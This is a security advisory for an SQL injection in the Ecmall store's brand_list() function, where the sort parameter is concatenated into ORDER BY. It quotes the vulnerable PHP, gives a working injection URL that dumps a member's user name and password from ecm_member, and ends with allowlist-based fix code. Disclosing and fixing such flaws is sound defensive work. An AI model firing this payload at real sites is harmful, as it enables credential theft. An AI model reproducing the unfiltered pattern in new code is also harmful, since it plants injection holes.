Ecmall SQL Injection Vulnerability
Defective file: /app/my_goods.app.php

    function brand_list()
    {
        $filtered = '';
        if (!empty($_GET['brand_name']) || !empty($_GET['store']))
        {
            $_GET['brand_name'] && $filtered = " AND brand_name LIKE '%{$_GET['brand_name']}%'";
            $_GET['store']      && $filtered = $filtered . " AND store_id=" . $this->_store_id;
        }
        if (isset($_GET['sort']) && isset($_GET['order']))
        {
            $sort  = strtolower(trim($_GET['sort']));   // unfiltered
            $order = strtolower(trim($_GET['order']));
            if (!in_array($order, array('asc', 'desc')))
            {
                $sort  = 'store_id';
                $order = 'desc';
            }
        }
        else
        {
            $sort  = 'store_id';
            $order = 'desc';
        }
        $page       = $this->_get_page(10);
        $conditions = $this->_get_query_conditions($con);
        $brand = $this->_brand_mod->find(array(      // trace
            'conditions' => "(1=1 $conditions)" . $filtered,
            'limit'      => $page['limit'],
            'order'      => "$sort $order",          // here
            'count'      => true,
        ));
        ......
    }

    function find($params = array())
    {
        extract($this->_initFindParams($params));

        /* field (select from) */
        $fields = $this->getRealFields($fields);
        $fields == '' && $fields = '*';
        $tables = $this->table . ' ' . $this->alias;

        /* left join */
        $join_result = $this->_joinModel($tables, $join);

        /* This was originally ($join_result || $index_key), which lost the original
         * intention: by default the primary key should only be appended so that the
         * result array can be indexed, so it depends only on whether the index key
         * is the primary key. */
        if ($index_key == $this->prikey || (is_array($index_key) && in_array($this->prikey, $index_key)))
        {
            /* If the index key contains the primary key, append the primary key to the queried fields by default */
            $fields .= ", {$this->alias}.{$this->prikey}";
        }

        /* condition (WHERE) */
        $conditions = $this->_getConditions($conditions, true);

        /* sort (order by) */
        $order && $order = 'ORDER BY ' . $this->getRealFields($order);   // trace
        ......
    }

    function getRealFields($src_fields_list)
    {
        $fields = $src_fields_list;
        if (!$src_fields_list)
        {
            $fields = '';
        }
        $fields = preg_replace('/([a-zA-Z0-9_]+)\.([a-zA-Z0-9_*]+)/e',
                               "\$this->_getFieldTable('\\1') . '.\\2'", $fields);
        return $fields;
    }

    function _getFieldTable($owner)
    {
        if ($owner == 'eas')
        {
            return $this->alias;
        }
        else
        {
            $m =& m($owner);
            if ($m === false)
            {
                /* no such model object: return the name unchanged */
                return $owner;
            }
            return $m->alias;
        }
    }
The sort parameter is taken from $_GET['sort'] without any validation and is concatenated straight into the ORDER BY clause, so SQL injection exists.

Usage:

A registered member opens a store.

Access: index.php?app=my_goods&act=brand_list&order=asc&sort=1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23

The user name and password are displayed.
Solution:

Filter the sort and order parameters: accept only column names from a fixed allowlist and only 'asc' or 'desc' for the direction, falling back to the defaults otherwise.
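One way to implement that filter, as an added example (this is not Ecmall's own patch; the helper name sanitize_sort_params() and the list of allowed columns are assumptions):

```php
<?php
// Added example: allowlist-based handling of the sort/order parameters
// used by brand_list(). Not Ecmall's own code; sanitize_sort_params()
// and the set of allowed columns are assumptions for illustration.

/**
 * Return a safe "column direction" pair for the ORDER BY clause.
 *
 * Column names are identifiers, not values, so they cannot be escaped or
 * bound as parameters; the only safe approach is to compare the user input
 * against a fixed allowlist and discard anything else. A value such as
 * "1 and (select ...)" therefore never reaches the query.
 */
function sanitize_sort_params($get, $allowed_columns,
                              $default_sort = 'store_id', $default_order = 'desc')
{
    $sort  = isset($get['sort'])  ? strtolower(trim($get['sort']))  : '';
    $order = isset($get['order']) ? strtolower(trim($get['order'])) : '';

    // Strict comparison so that only the exact column name matches.
    if (!in_array($sort, $allowed_columns, true)) {
        $sort = $default_sort;
    }
    if (!in_array($order, array('asc', 'desc'), true)) {
        $order = $default_order;
    }
    return array($sort, $order);
}

// Columns brand_list() may legitimately sort on (assumed set).
$allowed = array('store_id', 'brand_id', 'brand_name');

// Hardened counterpart of the vulnerable branch in brand_list():
//     list($sort, $order) = sanitize_sort_params($_GET, $allowed);
//     'order' => "$sort $order",
// The brand_name LIKE value in the same function is a data value, not an
// identifier, and should be escaped with the database layer's escaping
// function (or bound as a parameter) rather than allowlisted.

// Demonstration on constructed input.
$cases = array(
    array('sort' => 'brand_name', 'order' => 'asc'),
    array('sort' => '1 and (select 1)', 'order' => 'asc'),   // injection attempt
    array('sort' => 'store_id', 'order' => 'drop'),
    array(),
);
foreach ($cases as $c) {
    list($s, $o) = sanitize_sort_params($c, $allowed);
    $shown = isset($c['sort']) ? $c['sort'] : '(none)';
    printf("%-20s -> ORDER BY %s %s\n", $shown, $s, $o);
}
```

Only the second and third cases change: the injected sort expression and the bogus direction both collapse to the default "store_id desc", while a legitimate column and direction pass through unchanged.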